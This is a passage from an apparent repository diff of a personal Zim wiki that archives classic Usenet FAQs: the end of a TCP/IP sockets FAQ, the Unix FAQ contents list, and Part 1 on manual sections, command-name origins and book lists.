||||
application through the socket) and status operations (such as
|
||||
finding the IP address associated with the socket).
|
||||
|
||||
The complete set of operations that can be performed on a socket
|
||||
constitutes the Sockets API (Application Programming Interface).
|
||||
If you are interested in writing programs that use TCP/IP then
|
||||
you'll probably need to use and understand the sockets API. Your
|
||||
system manuals may have a description of the API (try `man socket'
|
||||
if you're using a Unix system) and many books devote chapters to
|
||||
it. A FAQ list for sockets programming is available on the Web
|
||||
from its Canadian home at <http://www.ibrado.com/sock-faq/>, from
|
||||
a UK mirror at <http://kipper.york.ac.uk/%7Evic/sock-faq/> or by
|
||||
anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/usenet/news.answers/unix-faq/>.
|
||||
|
||||
The TLI (Transport Layer Interface) API provides an alternative
|
||||
programming interface to TCP/IP on some systems, notably those
|
||||
based on AT&T's System V Unix. The Open Group, a Unix standards
|
||||
body, defines a variation of TLI called XTI (X/Open Transport
|
||||
Interface). Note that both sockets and TLI (and XTI) are
|
||||
general-purpose facilities and are defined to be completely
|
||||
independent of TCP/IP. TCP/IP is just one of the protocol families
|
||||
that can be accessed through these API's.
|
||||
|
||||
2. How can I detect that the other end of a TCP connection has
|
||||
crashed? Can I use "keepalives" for this?
|
||||
|
||||
Detecting crashed systems over TCP/IP is difficult. TCP doesn't
|
||||
require any transmission over a connection if the application
|
||||
isn't sending anything, and many of the media over which TCP/IP is
|
||||
used (e.g. Ethernet) don't provide a reliable way to determine
|
||||
whether a particular host is up. If a server doesn't hear from a
|
||||
client, it could be because it has nothing to say, some network
|
||||
between the server and client may be down, the server or client's
|
||||
network interface may be disconnected, or the client may have
|
||||
crashed. Network failures are often temporary (a thin Ethernet
|
||||
will appear down while someone is adding a link to the daisy
|
||||
chain, and it often takes a few minutes for new routes to
|
||||
stabilize when a router goes down) and TCP connections shouldn't
|
||||
be dropped as a result.
|
||||
|
||||
Keepalives are a feature of the sockets API that requests that an
|
||||
empty packet be sent periodically over an idle connection; this
|
||||
should evoke an acknowledgement from the remote system if it is
|
||||
still up, a reset if it has rebooted, and a timeout if it is down.
|
||||
These are not normally sent until the connection has been idle for
|
||||
a few hours. The purpose isn't to detect a crash immediately, but
|
||||
to keep unnecessary resources from being allocated forever.
|
||||
|
||||
If more rapid detection of remote failures is required, this
|
||||
should be implemented in the application protocol. There is no
|
||||
standard mechanism for this, but an example is requiring clients
|
||||
to send a "no-op" message every minute or two. An example protocol
|
||||
that uses this is X Display Manager Control Protocol (XDMCP), part
|
||||
of the X Window System, Version 11; the XDM server managing a
|
||||
session periodically sends a Sync command to the display server,
|
||||
which should evoke an application-level response, and resets the
|
||||
session if it doesn't get a response (this is actually an example
|
||||
of a poor implementation, as a timeout can occur if another client
|
||||
"grabs" the server for too long).
|
||||
|
||||
3. Can the TCP keepalive timeouts be configured?
|
||||
|
||||
This varies by operating system. There is a program that works on
|
||||
many Unices (though not Linux or Solaris), called netconfig, that
|
||||
allows one to do this and documents many of the variables. It is
|
||||
available by anonymous FTP from
|
||||
<ftp://cs.ucsd.edu:/pub/csl/Netconfig/>.
|
||||
|
||||
In addition, Richard Stevens' TCP/IP Illustrated, Volume 1
|
||||
includes a good discussion of setting the most useful variables on
|
||||
many platforms.
|
||||
|
||||
4. Are there object-oriented network programming tools?
|
||||
|
||||
Yes. One such system is the ADAPTIVE Communication Environment
|
||||
(ACE). The README file for ACE is available on the Web at
|
||||
<http://www.cs.wustl.edu/%7Eschmidt/ACE.html>. All software and
|
||||
documentation is available via both anonymous ftp and the Web.
|
||||
|
||||
ACE is available for anonymous ftp from
|
||||
<ftp://ics.uci.edu/gnu/>. That's a compressed
|
||||
tar archive approximately 500KB in size. This release contains
|
||||
contains the source code, documentation, and example test drivers
|
||||
for C++ wrapper libraries.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
This compilation contains the opinions of the FAQ maintainer and the
|
||||
various FAQ contributors. Any resemblance to the opinions of the FAQ
|
||||
maintainer's employer is entirely coincidental.
|
||||
|
||||
1260
Zim/Programme/APUE/FAQ/The_Well-Tempered_Unix_Application.txt
Normal file
1385
Zim/Programme/APUE/FAQ/Unix-socket-faq_for_network_programming.txt
Normal file
@@ -0,0 +1,185 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:06:27+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (Contents) ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.faqs.org/faqs/unix-faq/faq/contents/
|
||||
|
||||
Message-ID: <unix-faq/faq/contents_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (Contents) [Frequent posting]
|
||||
Date: 11 May 2004 10:49:59 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/contents
|
||||
Version: $Id: contents,v 2.9 1996/06/11 13:08:13 tmatimar Exp $
|
||||
|
||||
The following seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) An comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
The following questions are answered:
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
1.5) What are some useful Unix or C books?
|
||||
1.6) What happened to the pronunciation list that used to be
|
||||
part of this document?
|
||||
|
||||
2.1) How do I remove a file whose name begins with a "-" ?
|
||||
2.2) How do I remove a file with funny characters in the filename ?
|
||||
2.3) How do I get a recursive directory listing?
|
||||
2.4) How do I get the current directory into my prompt?
|
||||
2.5) How do I read characters from the terminal in a shell script?
|
||||
2.6) How do I rename "*.foo" to "*.bar", or change file names
|
||||
to lowercase?
|
||||
2.7) Why do I get [some strange error message] when I
|
||||
"rsh host command" ?
|
||||
2.8) How do I {set an environment variable, change directory} inside a
|
||||
program or shell script and have that change affect my
|
||||
current shell?
|
||||
2.9) How do I redirect stdout and stderr separately in csh?
|
||||
2.10) How do I tell inside .cshrc if I'm a login shell?
|
||||
2.11) How do I construct a shell glob-pattern that matches all files
|
||||
except "." and ".." ?
|
||||
2.12) How do I find the last argument in a Bourne shell script?
|
||||
2.13) What's wrong with having '.' in your $PATH ?
|
||||
2.14) How do I ring the terminal bell during a shell script?
|
||||
2.15) Why can't I use "talk" to talk with my friend on machine X?
|
||||
2.16) Why does calendar produce the wrong output?
|
||||
|
||||
3.1) How do I find the creation time of a file?
|
||||
3.2) How do I use "rsh" without having the rsh hang around
|
||||
until the remote command has completed?
|
||||
3.3) How do I truncate a file?
|
||||
3.4) Why doesn't find's "{}" symbol do what I want?
|
||||
3.5) How do I set the permissions on a symbolic link?
|
||||
3.6) How do I "undelete" a file?
|
||||
3.7) How can a process detect if it's running in the background?
|
||||
3.8) Why doesn't redirecting a loop work as intended? (Bourne shell)
|
||||
3.9) How do I run 'passwd', 'ftp', 'telnet', 'tip' and other interactive
|
||||
programs from a shell script or in the background?
|
||||
3.10) How do I find the process ID of a program with a particular
|
||||
name from inside a shell script or C program?
|
||||
3.11) How do I check the exit status of a remote command
|
||||
executed via "rsh" ?
|
||||
3.12) Is it possible to pass shell variable settings into an awk program?
|
||||
3.13) How do I get rid of zombie processes that persevere?
|
||||
3.14) How do I get lines from a pipe as they are written instead of
|
||||
only in larger blocks?
|
||||
3.15) How do I get the date into a filename?
|
||||
3.16) Why do some scripts start with #! ... ?
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
4.3) How do I find the name of an open file?
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it?)
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
5.2) How do I "include" one shell script from within another
|
||||
shell script?
|
||||
5.3) Do all shells have aliases? Is there something else that
|
||||
can be used?
|
||||
5.4) How are shell variables assigned?
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
5.6) What "dot" files do the various shells use?
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
6.1) Disclaimer and introduction.
|
||||
6.2) A very brief look at Unix history.
|
||||
6.3) Main Unix flavors.
|
||||
6.4) Main Players and Unix Standards.
|
||||
6.5) Identifying your Unix flavor.
|
||||
6.6) Brief notes on some well-known (commercial/PD) Unices.
|
||||
6.7) Real-time Unices.
|
||||
6.8) Unix glossary.
|
||||
6.9) Acknowledgements.
|
||||
|
||||
7.1) RCS vs SCCS: Introduction
|
||||
7.2) RCS vs SCCS: How do the interfaces compare?
|
||||
7.3) RCS vs SCCS: What's in a Revision File?
|
||||
7.4) RCS vs SCCS: What are the keywords?
|
||||
7.5) What's an RCS symbolic name?
|
||||
7.6) RCS vs SCCS: How do they compare for performance?
|
||||
7.7) RCS vs SCCS: Version Identification.
|
||||
7.8) RCS vs SCCS: How do they handle with problems?
|
||||
7.9) RCS vs SCCS: How do they interact with make(1)?
|
||||
7.10) RCS vs SCCS: Conversion.
|
||||
7.11) RCS vs SCCS: Support
|
||||
7.12) RCS vs SCCS: Command Comparison
|
||||
7.13) RCS vs SCCS: Acknowledgements
|
||||
7.14) Can I get more information on configuration management systems?
|
||||
|
||||
If you're looking for the answer to, say, question 2.5, look in
|
||||
part 2 and search for the regular expression "^2.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,427 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:07:15+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (1-7) ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.faqs.org/faqs/unix-faq/faq/part1/
|
||||
Message-ID: <unix-faq/faq/part1_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (1/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:49:59 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part1
|
||||
Version: $Id: part1,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) An comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
1.5) What are some useful Unix or C books?
|
||||
1.6) What happened to the pronunciation list that used to be
|
||||
part of this document?
|
||||
|
||||
If you're looking for the answer to, say, question 1.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^1.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: Who helped you put this list together?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.1) Who helped you put this list together?
|
||||
|
||||
This document was one of the first collections of Frequently Asked
|
||||
Questions. It was originally compiled in July 1989.
|
||||
|
||||
I took over the maintenance of this list. Almost all of the work
|
||||
(and the credit) for generating this compilation was done by
|
||||
Steve Hayman.
|
||||
|
||||
We also owe a great deal of thanks to dozens of Usenet readers who
|
||||
submitted questions, answers, corrections and suggestions for this
|
||||
list. Special thanks go to Maarten Litmaath, Guy Harris and
|
||||
Jonathan Kamens, who have all made many especially valuable
|
||||
contributions.
|
||||
|
||||
Part 5 of this document (shells) was written almost entirely by
|
||||
Matthew Wicks <wicks@dcdmjw.fnal.gov>.
|
||||
|
||||
Part 6 of this document (Unix flavours) was written almost entirely by
|
||||
Pierre (P.) Lewis <lew@bnr.ca>.
|
||||
|
||||
Where possible the author of each question and the date it was last
|
||||
updated is given at the top. Unfortunately, I only started this
|
||||
practice recently, and much of the information is lost. I was also
|
||||
negligent in keeping track of who provided updates to questions.
|
||||
Sorry to those who have made valuable contributions, but did not
|
||||
receive the credit and recognition that they legitimately deserve.
|
||||
|
||||
I make this document available in *roff format (ms and mm macro
|
||||
packages). Andrew Cromarty has also converted it into Texinfo format.
|
||||
Marty Leisner <leisner@sdsp.mc.xerox.com> cleaned up the Texinfo
|
||||
version.
|
||||
|
||||
Major contributors to this document who may or may not be
|
||||
recognized elsewhere are:
|
||||
|
||||
Steve Hayman <shayman@Objectario.com>
|
||||
Pierre Lewis <lew@bnr.ca>
|
||||
Jonathan Kamens <jik@mit.edu>
|
||||
Tom Christiansen <tchrist@mox.perl.com>
|
||||
Maarten Litmaath <maart@nat.vu.nl>
|
||||
Guy Harris <guy@auspex.com>
|
||||
|
||||
The formatted versions are available for anonymous ftp from
|
||||
ftp.wg.omron.co.jp under pub/unix-faq/docs .
|
||||
|
||||
|
||||
|
||||
Subject: When someone refers to 'rn(1)' ... the number in parentheses mean?
|
||||
Date: Tue, 13 Dec 1994 16:37:26 -0500
|
||||
|
||||
1.2) When someone refers to 'rn(1)' or 'ctime(3)', what does
|
||||
the number in parentheses mean?
|
||||
|
||||
It looks like some sort of function call, but it isn't. These
|
||||
numbers refer to the section of the "Unix manual" where the
|
||||
appropriate documentation can be found. You could type
|
||||
"man 3 ctime" to look up the manual page for "ctime" in section 3
|
||||
of the manual.
|
||||
|
||||
The traditional manual sections are:
|
||||
|
||||
1 User-level commands
|
||||
2 System calls
|
||||
3 Library functions
|
||||
4 Devices and device drivers
|
||||
5 File formats
|
||||
6 Games
|
||||
7 Various miscellaneous stuff - macro packages etc.
|
||||
8 System maintenance and operation commands
|
||||
|
||||
Some Unix versions use non-numeric section names. For instance,
|
||||
Xenix uses "C" for commands and "S" for functions. Some newer
|
||||
versions of Unix require "man -s# title" instead of "man # title".
|
||||
|
||||
Each section has an introduction, which you can read with "man #
|
||||
intro" where # is the section number.
|
||||
|
||||
Sometimes the number is necessary to differentiate between a
|
||||
command and a library routine or system call of the same name.
|
||||
For instance, your system may have "time(1)", a manual page about
|
||||
the 'time' command for timing programs, and also "time(3)", a
|
||||
manual page about the 'time' subroutine for determining the
|
||||
current time. You can use "man 1 time" or "man 3 time" to
|
||||
specify which "time" man page you're interested in.
|
||||
|
||||
You'll often find other sections for local programs or even
|
||||
subsections of the sections above - Ultrix has sections 3m, 3n,
|
||||
3x and 3yp among others.
|
||||
|
||||
|
||||
|
||||
Subject: What does {some strange unix command name} stand for?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.3) What does {some strange unix command name} stand for?
|
||||
|
||||
awk = "Aho Weinberger and Kernighan"
|
||||
|
||||
This language was named by its authors, Al Aho, Peter
|
||||
Weinberger and Brian Kernighan.
|
||||
|
||||
grep = "Global Regular Expression Print"
|
||||
|
||||
grep comes from the ed command to print all lines matching a
|
||||
certain pattern
|
||||
|
||||
g/re/p
|
||||
|
||||
where "re" is a "regular expression".
|
||||
|
||||
fgrep = "Fixed GREP".
|
||||
|
||||
fgrep searches for fixed strings only. The "f" does not stand
|
||||
for "fast" - in fact, "fgrep foobar *.c" is usually slower than
|
||||
"egrep foobar *.c" (Yes, this is kind of surprising. Try it.)
|
||||
|
||||
Fgrep still has its uses though, and may be useful when searching
|
||||
a file for a larger number of strings than egrep can handle.
|
||||
|
||||
egrep = "Extended GREP"
|
||||
|
||||
egrep uses fancier regular expressions than grep. Many people
|
||||
use egrep all the time, since it has some more sophisticated
|
||||
internal algorithms than grep or fgrep, and is usually the
|
||||
fastest of the three programs.
|
||||
|
||||
cat = "CATenate"
|
||||
|
||||
catenate is an obscure word meaning "to connect in a series",
|
||||
which is what the "cat" command does to one or more files. Not
|
||||
to be confused with C/A/T, the Computer Aided Typesetter.
|
||||
|
||||
gecos = "General Electric Comprehensive Operating Supervisor"
|
||||
|
||||
When GE's large systems division was sold to Honeywell,
|
||||
Honeywell dropped the "E" from "GECOS".
|
||||
|
||||
Unix's password file has a "pw_gecos" field. The name is a
|
||||
real holdover from the early days. Dennis Ritchie has reported:
|
||||
|
||||
"Sometimes we sent printer output or batch jobs
|
||||
to the GCOS machine. The gcos field in the password file
|
||||
was a place to stash the information for the $IDENT card.
|
||||
Not elegant."
|
||||
|
||||
nroff = "New ROFF"
|
||||
troff = "Typesetter new ROFF"
|
||||
|
||||
These are descendants of "roff", which was a re-implementation
|
||||
of the Multics "runoff" program (a program that you'd use to
|
||||
"run off" a good copy of a document).
|
||||
|
||||
tee = T
|
||||
|
||||
From plumbing terminology for a T-shaped pipe splitter.
|
||||
|
||||
bss = "Block Started by Symbol"
|
||||
|
||||
Dennis Ritchie says:
|
||||
|
||||
Actually the acronym (in the sense we took it up; it may
|
||||
have other credible etymologies) is "Block Started by
|
||||
Symbol." It was a pseudo-op in FAP (Fortran Assembly [-er?]
|
||||
Program), an assembler for the IBM 704-709-7090-7094
|
||||
machines. It defined its label and set aside space for a
|
||||
given number of words. There was another pseudo-op, BES,
|
||||
"Block Ended by Symbol" that did the same except that the
|
||||
label was defined by the last assigned word + 1. (On these
|
||||
machines Fortran arrays were stored backwards in storage
|
||||
and were 1-origin.)
|
||||
|
||||
The usage is reasonably appropriate, because just as with
|
||||
standard Unix loaders, the space assigned didn't have to be
|
||||
punched literally into the object deck but was represented
|
||||
by a count somewhere.
|
||||
|
||||
biff = "BIFF"
|
||||
|
||||
This command, which turns on asynchronous mail notification,
|
||||
was actually named after a dog at Berkeley.
|
||||
|
||||
I can confirm the origin of biff, if you're interested.
|
||||
Biff was Heidi Stettner's dog, back when Heidi (and I, and
|
||||
Bill Joy) were all grad students at U.C. Berkeley and the
|
||||
early versions of BSD were being developed. Biff was
|
||||
popular among the residents of Evans Hall, and was known
|
||||
for barking at the mailman, hence the name of the command.
|
||||
|
||||
Confirmation courtesy of Eric Cooper, Carnegie Mellon University
|
||||
|
||||
rc (as in ".cshrc" or "/etc/rc") = "RunCom"
|
||||
|
||||
"rc" derives from "runcom", from the MIT CTSS system, ca. 1965.
|
||||
|
||||
'There was a facility that would execute a bunch of
|
||||
commands stored in a file; it was called "runcom" for "run
|
||||
commands", and the file began to be called "a runcom."
|
||||
|
||||
"rc" in Unix is a fossil from that usage.'
|
||||
|
||||
Brian Kernighan & Dennis Ritchie, as told to Vicki Brown
|
||||
|
||||
"rc" is also the name of the shell from the new Plan 9
|
||||
operating system.
|
||||
|
||||
Perl = "Practical Extraction and Report Language"
|
||||
Perl = "Pathologically Eclectic Rubbish Lister"
|
||||
|
||||
The Perl language is Larry Wall's highly popular
|
||||
freely-available completely portable text, process, and file
|
||||
manipulation tool that bridges the gap between shell and C
|
||||
programming (or between doing it on the command line and
|
||||
pulling your hair out). For further information, see the
|
||||
Usenet newsgroup comp.lang.perl.misc.
|
||||
|
||||
Don Libes' book "Life with Unix" contains lots more of these
|
||||
tidbits.
|
||||
|
||||
|
||||
|
||||
Subject: How does the gateway between "comp.unix.questions" ... work ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.4) How does the gateway between "comp.unix.questions" and the
|
||||
"info-unix" mailing list work?
|
||||
|
||||
"info-unix" and "unix-wizards" are mailing list versions of
|
||||
comp.unix.questions and comp.unix.wizards respectively.
|
||||
There should be no difference in content between the
|
||||
mailing list and the newsgroup.
|
||||
|
||||
To get on or off either of these lists, send mail to
|
||||
info-unix-request@brl.mil or unix-wizards-request@brl.mil.
|
||||
Be sure to use the '-Request'. Don't expect an immediate response.
|
||||
|
||||
Here are the gory details, courtesy of the list's maintainer,
|
||||
Bob Reschly.
|
||||
|
||||
==== postings to info-UNIX and UNIX-wizards lists ====
|
||||
|
||||
Anything submitted to the list is posted; I do not moderate
|
||||
incoming traffic -- BRL functions as a reflector. Postings
|
||||
submitted by Internet subscribers should be addressed to the list
|
||||
address (info-UNIX or UNIX- wizards); the '-request' addresses
|
||||
are for correspondence with the list maintainer [me]. Postings
|
||||
submitted by USENET readers should be addressed to the
|
||||
appropriate news group (comp.unix.questions or
|
||||
comp.unix.wizards).
|
||||
|
||||
For Internet subscribers, received traffic will be of two types;
|
||||
individual messages, and digests. Traffic which comes to BRL
|
||||
from the Internet and BITNET (via the BITNET-Internet gateway) is
|
||||
immediately resent to all addressees on the mailing list.
|
||||
Traffic originating on USENET is gathered up into digests which
|
||||
are sent to all list members daily.
|
||||
|
||||
BITNET traffic is much like Internet traffic. The main
|
||||
difference is that I maintain only one address for traffic
|
||||
destined to all BITNET subscribers. That address points to a list
|
||||
exploder which then sends copies to individual BITNET
|
||||
subscribers. This way only one copy of a given message has to
|
||||
cross the BITNET-Internet gateway in either direction.
|
||||
|
||||
USENET subscribers see only individual messages. All messages
|
||||
originating on the Internet side are forwarded to our USENET
|
||||
machine. They are then posted to the appropriate newsgroup.
|
||||
Unfortunately, for gatewayed messages, the sender becomes
|
||||
"news@brl-adm". This is currently an unavoidable side-effect of
|
||||
the software which performs the gateway function.
|
||||
|
||||
As for readership, USENET has an extremely large readership - I
|
||||
would guess several thousand hosts and tens of thousands of
|
||||
readers. The master list maintained here at BRL runs about two
|
||||
hundred fifty entries with roughly ten percent of those being
|
||||
local redistribution lists. I don't have a good feel for the
|
||||
size of the BITNET redistribution, but I would guess it is
|
||||
roughly the same size and composition as the master list.
|
||||
Traffic runs 150K to 400K bytes per list per week on average.
|
||||
|
||||
|
||||
|
||||
Subject: What are some useful Unix or C books?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.5) What are some useful Unix or C books?
|
||||
|
||||
Mitch Wright (mitch@cirrus.com) maintains a useful list of Unix
|
||||
and C books, with descriptions and some mini-reviews. There are
|
||||
currently 167 titles on his list.
|
||||
|
||||
You can obtain a copy of this list by anonymous ftp from
|
||||
ftp.rahul.net (192.160.13.1), where it's "pub/mitch/YABL/yabl".
|
||||
Send additions or suggestions to mitch@cirrus.com.
|
||||
|
||||
Samuel Ko (kko@sfu.ca) maintains another list of Unix books.
|
||||
This list contains only recommended books, and is therefore
|
||||
somewhat shorter. This list is also a classified list, with
|
||||
books grouped into categories, which may be better if you are
|
||||
looking for a specific type of book.
|
||||
|
||||
You can obtain a copy of this list by anonymous ftp from
|
||||
rtfm.mit.edu, where it's "pub/usenet/news.answers/books/unix".
|
||||
Send additions or suggestions to kko@sfu.ca.
|
||||
|
||||
If you can't use anonymous ftp, email the line "help" to
|
||||
"ftpmail@decwrl.dec.com" for instructions on retrieving
|
||||
things via email.
|
||||
|
||||
|
||||
|
||||
Subject: What happened to the pronunciation list ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
1.6) What happened to the pronunciation list that used to be part of this
|
||||
document?
|
||||
|
||||
From its inception in 1989, this FAQ document included a
|
||||
comprehensive pronunciation list maintained by Maarten Litmaath
|
||||
(thanks, Maarten!). It was originally created by Carl Paukstis
|
||||
<carlp@frigg.isc-br.com>.
|
||||
|
||||
It has been retired, since it is not really relevant to the topic
|
||||
of "Unix questions". You can still find it as part of the
|
||||
widely-distributed "Jargon" file (maintained by Eric S. Raymond,
|
||||
eric@snark.thyrsus.com) which seems like a much more appropriate
|
||||
forum for the topic of "How do you pronounce /* ?"
|
||||
|
||||
If you'd like a copy, you can ftp one from ftp.wg.omron.co.jp
|
||||
(133.210.4.4), it's "pub/unix-faq/docs/Pronunciation-Guide".
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 1 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,677 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:03+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (4-7) ======
|
||||
Created 星期二 07 六月 2011
|
||||
Message-ID: <unix-faq/faq/part4_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (4/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:00 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part4
|
||||
Version: $Id: part4,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
